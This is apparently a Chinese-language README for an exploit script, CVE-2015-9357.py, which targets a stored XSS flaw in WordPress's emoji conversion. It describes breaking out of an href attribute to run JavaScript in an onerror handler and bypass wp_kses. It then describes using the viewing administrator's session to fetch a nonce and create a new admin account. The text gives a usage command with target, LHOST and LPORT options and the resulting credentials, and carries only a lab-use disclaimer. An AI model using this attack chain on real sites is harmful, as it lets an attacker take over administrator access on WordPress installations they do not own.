WordPress 表情解析器存储型跨站脚本,通过伪造 nonce 请求创建管理员用户。
通过表情符号正则表达式突破 <a href> 属性上下文,将 JavaScript 注入 onerror 处理程序。无需 script 标签,可绕过受影响字段上的 wp_kses 过滤。
攻击链:将载荷提交到任何会进行表情转换的字段,管理员查看后,XSS 在其会话中触发,从 user-new.php 拉取创建用户的 nonce,提交新的管理员账户,通过登录确认。
仅限实验室/教育用途。要求目标字段实际应用 WordPress 表情转换,因主题/插件而异。
原始漏洞披露:https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
python3 CVE-2015-9357.py -t https://target -l LHOST -p LPORT \
--endpoint https://target/wp-admin/admin-ajax.php \
--field message --action <ajax_action> --nonce <nonce> \
--data "name=a,[email protected],phone=a"
--endpoint / --field 取决于易受攻击的输入实际位置(评论、联系表单等),请先手动查找。
成功输出:管理员凭据(pwned / Password123!)和 wp-admin URL。